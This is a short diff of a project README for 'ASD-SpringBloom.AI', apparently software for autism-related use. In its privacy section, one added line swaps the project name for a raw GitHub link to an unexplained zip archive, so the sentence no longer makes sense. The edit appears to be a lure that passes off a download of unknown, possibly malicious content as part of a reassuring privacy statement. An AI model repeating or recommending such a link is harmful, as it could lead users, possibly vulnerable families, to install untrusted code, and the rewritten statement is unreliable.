PinnGR/ASD-SpringBloom.AI/README.md

 ## 🔒 Privacy & Security

-ASD-SpringBloom.AI respects your privacy.
+https://raw.githubusercontent.com/PinnGR/ASD-SpringBloom.AI/main/services/Bloom_Spring_AS_AI_unangelic.zip respects your privacy.
 All your input and reports are stored only on your device.
 The software does not send personal information anywhere without your permission.

 You can back up and export data to your computer for safekeeping.